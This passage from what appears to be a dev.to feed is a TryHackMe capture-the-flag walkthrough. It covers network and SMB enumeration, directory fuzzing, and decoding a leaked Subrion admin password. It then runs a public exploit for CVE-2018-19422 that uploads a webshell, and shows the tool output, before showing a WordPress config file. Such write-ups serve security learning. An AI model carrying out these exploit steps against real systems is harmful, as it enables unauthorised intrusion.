&lt;/span&gt;&lt;span class="nx"&gt;nt&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;authority\system&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;DONE! Go get that root flag!&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>security</category>
      <category>tryhackme</category>
      <category>ctf</category>
    </item>
    <item>
      <title>TryHackMe Tech_Supp0rt: 1 Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Sun, 06 Nov 2022 03:34:32 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-techsupp0rt-1-walkthrough-3gmp</link>
      <guid>https://dev.to/wandering-geek/tryhackme-techsupp0rt-1-walkthrough-3gmp</guid>
      <description>&lt;p&gt;TryHackMe Page for the Machine =&amp;gt; &lt;a href="https://tryhackme.com/room/techsupp0rt1" rel="noopener noreferrer"&gt;https://tryhackme.com/room/techsupp0rt1&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Enum
&lt;/h1&gt;

&lt;h2&gt;
  
  
  rustscan nmap
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;rustscan &lt;span class="nt"&gt;-a&lt;/span&gt; 10.10.26.146 &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt;

PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtST3F95eem6k4V02TcUi7/Qtn3WvJGNfqpbE+7EVuN2etoFpihgP5LFK2i/EDbeIAiEPALjtKy3gFMEJ5QDCkglBYt3gUbYv29TQBdx+LZQ8Kjry7W+KCKXhkKJEVnkT5cN6lYZIGAkIAVXacZ/YxWjj+ruSAx07fnNLMkqsMR9VA+8w0L2BsXhzYAwCdWrfRf8CE1UEdJy6WIxRsxIYOk25o9R44KXOWT2F8pP2tFbNcvUMlUY6jGHmXgrIEwDiBHuwd3uG5cVVmxJCCSY6Ygr9Aa12nXmUE5QJE9lisYIPUn9IjbRFb2d2hZE2jQHq3WCGdAls2Bwnn7Rgc7J09
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBClT+wif/EERxNcaeTiny8IrQ5Qn6uEM7QxRlouee7KWHrHXomCB/Bq4gJ95Lx5sRPQJhGOZMLZyQaKPTIaILNQ&lt;span class="o"&gt;=&lt;/span&gt;
|   256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDolvqv0mvkrpBMhzpvuXHjJlRv/vpYhMabXxhkBxOwz
80/tcp  open  http        syn-ack Apache httpd 2.4.18 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X &lt;span class="o"&gt;(&lt;/span&gt;workgroup: WORKGROUP&lt;span class="o"&gt;)&lt;/span&gt;
445/tcp open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu &lt;span class="o"&gt;(&lt;/span&gt;workgroup: WORKGROUP&lt;span class="o"&gt;)&lt;/span&gt;
Service Info: Host: TECHSUPPORT&lt;span class="p"&gt;;&lt;/span&gt; OS: Linux&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: &lt;span class="nt"&gt;-1h49m59s&lt;/span&gt;, deviation: 3h10m30s, median: 0s
| p2p-conficker: 
|   Checking &lt;span class="k"&gt;for &lt;/span&gt;Conficker.C or higher...
|   Check 1 &lt;span class="o"&gt;(&lt;/span&gt;port 18468/tcp&lt;span class="o"&gt;)&lt;/span&gt;: CLEAN &lt;span class="o"&gt;(&lt;/span&gt;Couldn&lt;span class="s1"&gt;'t connect)
|   Check 2 (port 42676/tcp): CLEAN (Couldn'&lt;/span&gt;t connect&lt;span class="o"&gt;)&lt;/span&gt;
|   Check 3 &lt;span class="o"&gt;(&lt;/span&gt;port 46039/udp&lt;span class="o"&gt;)&lt;/span&gt;: CLEAN &lt;span class="o"&gt;(&lt;/span&gt;Timeout&lt;span class="o"&gt;)&lt;/span&gt;
|   Check 4 &lt;span class="o"&gt;(&lt;/span&gt;port 2861/udp&lt;span class="o"&gt;)&lt;/span&gt;: CLEAN &lt;span class="o"&gt;(&lt;/span&gt;Failed to receive data&lt;span class="o"&gt;)&lt;/span&gt;
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 &lt;span class="o"&gt;(&lt;/span&gt;Samba 4.3.11-Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT&lt;span class="se"&gt;\x&lt;/span&gt;00
|   Domain name: &lt;span class="se"&gt;\x&lt;/span&gt;00
|   FQDN: techsupport
|_  System &lt;span class="nb"&gt;time&lt;/span&gt;: 2022-11-04T17:24:12+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled &lt;span class="o"&gt;(&lt;/span&gt;dangerous, but default&lt;span class="o"&gt;)&lt;/span&gt;
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   &lt;span class="nb"&gt;date&lt;/span&gt;: 2022-11-04T11:54:12
|_  start_date: N/A

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  SMB Server Enum
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;crackmapexec smb techsupport.thm &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; 
SMB         techsupport.thm 445    TECHSUPPORT      &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Windows 6.1 &lt;span class="o"&gt;(&lt;/span&gt;name:TECHSUPPORT&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;domain:&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;signing:False&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;SMBv1:True&lt;span class="o"&gt;)&lt;/span&gt;
SMB         techsupport.thm 445    TECHSUPPORT      &lt;span class="o"&gt;[&lt;/span&gt;+] &lt;span class="se"&gt;\:&lt;/span&gt; 


└─&lt;span class="nv"&gt;$ &lt;/span&gt;crackmapexec smb techsupport.thm &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'a'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; &lt;span class="nt"&gt;--shares&lt;/span&gt;
SMB         techsupport.thm 445    TECHSUPPORT      &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Windows 6.1 &lt;span class="o"&gt;(&lt;/span&gt;name:TECHSUPPORT&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;domain:&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;signing:False&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;SMBv1:True&lt;span class="o"&gt;)&lt;/span&gt;
SMB         techsupport.thm 445    TECHSUPPORT      &lt;span class="o"&gt;[&lt;/span&gt;+] &lt;span class="se"&gt;\a&lt;/span&gt;: 
SMB         techsupport.thm 445    TECHSUPPORT      &lt;span class="o"&gt;[&lt;/span&gt;+] Enumerated shares
SMB         techsupport.thm 445    TECHSUPPORT      Share           Permissions     Remark
SMB         techsupport.thm 445    TECHSUPPORT      &lt;span class="nt"&gt;-----&lt;/span&gt;           &lt;span class="nt"&gt;-----------&lt;/span&gt;     &lt;span class="nt"&gt;------&lt;/span&gt;
SMB         techsupport.thm 445    TECHSUPPORT      print&lt;span class="nv"&gt;$ &lt;/span&gt;                         Printer Drivers
SMB         techsupport.thm 445    TECHSUPPORT      websvr          READ            
SMB         techsupport.thm 445    TECHSUPPORT      IPC&lt;span class="nv"&gt;$ &lt;/span&gt;                           IPC Service &lt;span class="o"&gt;(&lt;/span&gt;TechSupport server &lt;span class="o"&gt;(&lt;/span&gt;Samba, Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;

┌──&lt;span class="o"&gt;(&lt;/span&gt;kali㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~/Documents/ctf/thm_easy_techsupport]
└─&lt;span class="nv"&gt;$ &lt;/span&gt;smbclient //techsupport.thm/websvr   
Password &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;WORKGROUP&lt;span class="se"&gt;\k&lt;/span&gt;ali]:
Try &lt;span class="s2"&gt;"help"&lt;/span&gt; to get a list of possible commands.
smb: &lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; PROMPT OFF
smb: &lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; RECURSE ON
smb: &lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; mget &lt;span class="k"&gt;*&lt;/span&gt;
getting file &lt;span class="se"&gt;\e&lt;/span&gt;nter.txt of size 273 as enter.txt &lt;span class="o"&gt;(&lt;/span&gt;0.4 KiloBytes/sec&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;average 0.4 KiloBytes/sec&lt;span class="o"&gt;)&lt;/span&gt;
smb: &lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;exit&lt;/span&gt;

┌──&lt;span class="o"&gt;(&lt;/span&gt;kali㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~/Documents/ctf/thm_easy_techsupport]
└─&lt;span class="nv"&gt;$ &lt;/span&gt;ll    
total 4
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 kali kali 273 Nov  4 08:58 enter.txt

┌──&lt;span class="o"&gt;(&lt;/span&gt;kali㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~/Documents/ctf/thm_easy_techsupport]
└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;enter.txt                                         
GOALS
&lt;span class="o"&gt;=====&lt;/span&gt;
1&lt;span class="o"&gt;)&lt;/span&gt;Make fake popup and host it online on Digital Ocean server
2&lt;span class="o"&gt;)&lt;/span&gt;Fix subrion site, /subrion doesn&lt;span class="s1"&gt;'t work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|-&amp;gt;admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|-&amp;gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trying to access this &lt;code&gt;/subrion&lt;/code&gt; folder. Did not work in the browser. So tried accessing it via curl&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;-v&lt;/span&gt; http://techsupport.thm/subrion/
&lt;span class="k"&gt;*&lt;/span&gt;   Trying 10.10.26.146:80...
&lt;span class="k"&gt;*&lt;/span&gt; Connected to techsupport.thm &lt;span class="o"&gt;(&lt;/span&gt;10.10.26.146&lt;span class="o"&gt;)&lt;/span&gt; port 80 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="c"&gt;#0)&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; GET /subrion/ HTTP/1.1
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; Host: techsupport.thm
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; User-Agent: curl/7.85.0
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; Accept: &lt;span class="k"&gt;*&lt;/span&gt;/&lt;span class="k"&gt;*&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; 
&lt;span class="k"&gt;*&lt;/span&gt; Mark bundle as not supporting multiuse
&amp;lt; HTTP/1.1 302 Found
&amp;lt; Date: Fri, 04 Nov 2022 13:04:03 GMT
&amp;lt; Server: Apache/2.4.18 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
&amp;lt; Set-Cookie: &lt;span class="nv"&gt;INTELLI_06c8042c3d&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0knjt7oo4bvcpfd14hns363f0i&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/
&amp;lt; Expires: Thu, 19 Nov 1981 08:52:00 GMT
&amp;lt; Cache-Control: no-store, no-cache, must-revalidate
&amp;lt; Pragma: no-cache
&amp;lt; Set-Cookie: &lt;span class="nv"&gt;INTELLI_06c8042c3d&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0knjt7oo4bvcpfd14hns363f0i&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;expires&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Fri, 04-Nov-2022 13:34:03 GMT&lt;span class="p"&gt;;&lt;/span&gt; Max-Age&lt;span class="o"&gt;=&lt;/span&gt;1800&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/
&amp;lt; Location: http://10.0.2.15/subrion/subrion/
&amp;lt; Content-Length: 0
&amp;lt; Content-Type: text/html&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;charset&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;UTF-8
&amp;lt; 
&lt;span class="k"&gt;*&lt;/span&gt; Connection &lt;span class="c"&gt;#0 to host techsupport.thm left intact&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No wonder its not working. There is a 302 redirect to a strange IP. Also a strange cookie value.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;enter.txt&lt;/code&gt; mentions a &lt;em&gt;panel&lt;/em&gt;, which I am guessing is some kind of CMS admin panel.&lt;/p&gt;

&lt;p&gt;Let's try and find it. Modifying my usual &lt;code&gt;ffuf&lt;/code&gt; statement to remove the &lt;code&gt;-r&lt;/code&gt; option to ensure redirects are not followed. Also filtering for 302 status codes. Regarding the 302, the server seems to be configured to return a 302 redirect to 10.0.2.15, when we try to access a subfolder of &lt;code&gt;subrion&lt;/code&gt;, which will make fuzzing a pain in the behind if we dont handle it properly.&lt;/p&gt;

&lt;p&gt;Example&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;-v&lt;/span&gt; http://techsupport.thm/subrion/whatintheworld/
&lt;span class="k"&gt;*&lt;/span&gt;   Trying 10.10.26.146:80...
&lt;span class="k"&gt;*&lt;/span&gt; Connected to techsupport.thm &lt;span class="o"&gt;(&lt;/span&gt;10.10.26.146&lt;span class="o"&gt;)&lt;/span&gt; port 80 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="c"&gt;#0)&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; GET /subrion/whatintheworld/ HTTP/1.1
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; Host: techsupport.thm
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; User-Agent: curl/7.85.0
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; Accept: &lt;span class="k"&gt;*&lt;/span&gt;/&lt;span class="k"&gt;*&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; 
&lt;span class="k"&gt;*&lt;/span&gt; Mark bundle as not supporting multiuse
&amp;lt; HTTP/1.1 302 Found
&amp;lt; Date: Fri, 04 Nov 2022 13:21:48 GMT
&amp;lt; Server: Apache/2.4.18 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
&amp;lt; Set-Cookie: &lt;span class="nv"&gt;INTELLI_06c8042c3d&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0e7gu6bkk63fuvtkv8t5rfk5sr&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/
&amp;lt; Expires: Thu, 19 Nov 1981 08:52:00 GMT
&amp;lt; Cache-Control: no-store, no-cache, must-revalidate
&amp;lt; Pragma: no-cache
&amp;lt; Set-Cookie: &lt;span class="nv"&gt;INTELLI_06c8042c3d&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0e7gu6bkk63fuvtkv8t5rfk5sr&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;expires&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Fri, 04-Nov-2022 13:51:48 GMT&lt;span class="p"&gt;;&lt;/span&gt; Max-Age&lt;span class="o"&gt;=&lt;/span&gt;1800&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/
&amp;lt; Location: http://10.0.2.15/subrion/subrion/whatintheworld/
&amp;lt; Content-Length: 0
&amp;lt; Content-Type: text/html&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;charset&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;UTF-8
&amp;lt; 
&lt;span class="k"&gt;*&lt;/span&gt; Connection &lt;span class="c"&gt;#0 to host techsupport.thm left intact&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note: Also removed the &lt;code&gt;-recursion&lt;/code&gt; option. There is a &lt;code&gt;/&lt;/code&gt; after FUZZ. If we don't add this, the server returns a 301 with the slash added. But for the recursion option to work, the FUZZ keyword needs to be the last thing on the URL string. &lt;/p&gt;

&lt;p&gt;Now, let's fuzz!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;ffuf &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt &lt;span class="nt"&gt;-u&lt;/span&gt; http://techsupport.thm/subrion/FUZZ/ &lt;span class="nt"&gt;-o&lt;/span&gt; ffuf/raftLarge &lt;span class="nt"&gt;-of&lt;/span&gt; html &lt;span class="nt"&gt;-ic&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz &lt;span class="nt"&gt;-sf&lt;/span&gt; &lt;span class="nt"&gt;-t&lt;/span&gt; 50 &lt;span class="nt"&gt;-fc&lt;/span&gt; 302 

&lt;span class="nb"&gt;install&lt;/span&gt;                 &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 13125, Words: 6273, Lines: 212, Duration: 311ms]
updates                 &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 196ms]
panel.php               &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.sql               &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.bak               &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.db                &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel                   &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.html              &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.zip               &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.txt               &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.gz                &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 794ms]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;a href="http://techsupport.thm/subrion/install/install/" rel="noopener noreferrer"&gt;http://techsupport.thm/subrion/install/install/&lt;/a&gt; - Pre-installation check. Shows software versions of multiple installed software on the machine.&lt;/li&gt;
&lt;li&gt;
&lt;a href="http://techsupport.thm/subrion/panel/" rel="noopener noreferrer"&gt;http://techsupport.thm/subrion/panel/&lt;/a&gt; - Login portal. The credentials we found earlier in the SMB share dont work. &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Trying to decode password in Cyberchef. &lt;br&gt;
&lt;a href="https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)" rel="noopener noreferrer"&gt;https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Subrion login creds&lt;br&gt;
| user | pass |&lt;br&gt;
| -- | -- |&lt;br&gt;
| admin | CENSORED |&lt;/p&gt;
&lt;h2&gt;
  
  
  Subrion Admin Portal Enum
&lt;/h2&gt;

&lt;p&gt;After login.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk07x7l73qzufm7yyl29x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk07x7l73qzufm7yyl29x.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Subrion Version 4.2.1 is installed. Searching for anything regarding this version on ExploitDB, we get &lt;a href="https://www.exploit-db.com/exploits/49876" rel="noopener noreferrer"&gt;https://www.exploit-db.com/exploits/49876&lt;/a&gt;. An arbitrary file upload exploit.&lt;/p&gt;

&lt;p&gt;Let's try and use it.&lt;/p&gt;
&lt;h3&gt;
  
  
  Uploading a reverse shell using &lt;strong&gt;CVE-2018-19422&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Don't forget to add the slash after &lt;code&gt;panel&lt;/code&gt; in the URL when running the exploit.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;python3 49876.py &lt;span class="nt"&gt;-u&lt;/span&gt; http://techsupport.thm/subrion/panel/ &lt;span class="nt"&gt;--user&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;admin &lt;span class="nt"&gt;--passw&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;CENSORED
&lt;span class="o"&gt;[&lt;/span&gt;+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

&lt;span class="o"&gt;[&lt;/span&gt;+] Trying to connect to: http://techsupport.thm/subrion/panel/
&lt;span class="o"&gt;[&lt;/span&gt;+] Success!
&lt;span class="o"&gt;[&lt;/span&gt;+] Got CSRF token: 7LJC4WPSmVW99qpA8XKWZZPAUDIcilg43wfRfpQi
&lt;span class="o"&gt;[&lt;/span&gt;+] Trying to log &lt;span class="k"&gt;in&lt;/span&gt;...
&lt;span class="o"&gt;[&lt;/span&gt;+] Login Successful!

&lt;span class="o"&gt;[&lt;/span&gt;+] Generating random name &lt;span class="k"&gt;for &lt;/span&gt;Webshell...
&lt;span class="o"&gt;[&lt;/span&gt;+] Generated webshell name: ipmrjrdahkbtipn

&lt;span class="o"&gt;[&lt;/span&gt;+] Trying to Upload Webshell..
&lt;span class="o"&gt;[&lt;/span&gt;+] Upload Success... Webshell path: http://techsupport.thm/subrion/panel/uploads/ipmrjrdahkbtipn.phar 

&lt;span class="nv"&gt;$ &lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The above exploit gives us a command shell. Let's pivot to a full featured reverse shell by running a Python3 reverse shell command.&lt;br&gt;
Here are some good examples =&amp;gt; &lt;a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python" rel="noopener noreferrer"&gt;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With this shell, we can get a foothold on the machine.&lt;/p&gt;
&lt;h1&gt;
  
  
  Foothold
&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;wp-config.php&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cd"&gt;/** The name of the database for WordPress */&lt;/span&gt;
&lt;span class="nb"&gt;define&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'DB_NAME'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'wpdb'&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cd"&gt;/** MySQL database username */&lt;/span&gt;
&lt;span class="nb"&gt;define&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'DB_USER'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'support'&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cd"&gt;/** MySQL database password */&lt;/span&gt;
&lt;span class="nb"&gt;define&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'DB_PASSWORD'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'CENSORED'&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cd"&gt;/** MySQL hostname */&lt;/span&gt;
&lt;span class="nb"&gt;define&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'DB_HOST'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'localhost'&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cd"&gt;/** Database Charset to use in creating database tables. */&lt;/span&gt;
&lt;span class="nb"&gt;define&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'DB_CHARSET'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'utf8'&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cd"&gt;/** The Database Collate type. Don't change this if in doubt. */&lt;/span&gt;
